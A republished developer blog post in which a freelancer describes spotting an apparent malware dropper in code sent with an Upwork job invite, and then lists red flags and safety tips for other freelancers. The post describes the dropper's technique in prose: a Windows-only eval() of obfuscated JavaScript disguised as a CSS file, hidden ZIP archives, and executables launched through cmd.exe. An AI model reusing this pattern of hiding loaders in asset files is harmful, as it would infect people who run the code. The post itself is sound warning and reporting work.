This content originally appeared on DEV Community and was authored by Bashar V I
Today I received an Upwork job invite titled
“Experienced Node.js Coder Needed for Bug Fix”
with a tempting $760 fixed price and a Dropbox link to the code.
It looked normal at first, but a few details didn’t sit right:
- đź’¸ Unrealistic budget for a simple bug fix.
- 📦 The client insisted I download and run a ZIP immediately to “see the error.”
- 👤 Profile not payment verified and brand-new.
Instead of running it, I inspected the archive without executing anything.
Here’s what I found:
- node/helpers/css.js reads a “CSS” file (public/css/types.txt) and runs it with eval() only on Windows.
- types.txt isn’t CSS at all—it’s obfuscated JavaScript that
- extracts hidden ZIPs (js.zip, node.zip, i.zip),and silently spawns Windows executables via cmd.exe /c start.
- The project even bundles a 7-Zip binary so it can unpack those hidden files locally.**_
That pattern—obfuscation + hidden zips + detached .exe launch—is exactly how a dropper/backdoor works.
I’ve flagged the job and reported it to @Upwork Trust & Safety so they can warn others.
🔑 Takeaways for fellow freelancers
- Never run code from strangers without first looking inside (even on trusted platforms).
- Watch for red flags: unverified payment, big payout for trivial work, pressure to run code immediately.
- If something feels off, stop, inspect, and report.
Stay safe and keep each other safe.
Upwork #freelance #security #NodeJS #infosec #webdev #malware
This content originally appeared on DEV Community and was authored by Bashar V I
Bashar V I | Sciencx (2025-09-23T20:14:13+00:00) 🚨 Freelancers beware: how a suspicious “Node.js bug fix” invite helped me spot a possible malware dropper on Upwork. Retrieved from https://www.scien.cx/2025/09/23/%f0%9f%9a%a8-freelancers-beware-how-a-suspicious-node-js-bug-fix-invite-helped-me-spot-a-possible-malware-dropper-on-upwork-2/
Please log in to upload a file.
There are no updates yet.
Click the Upload button above to add an update.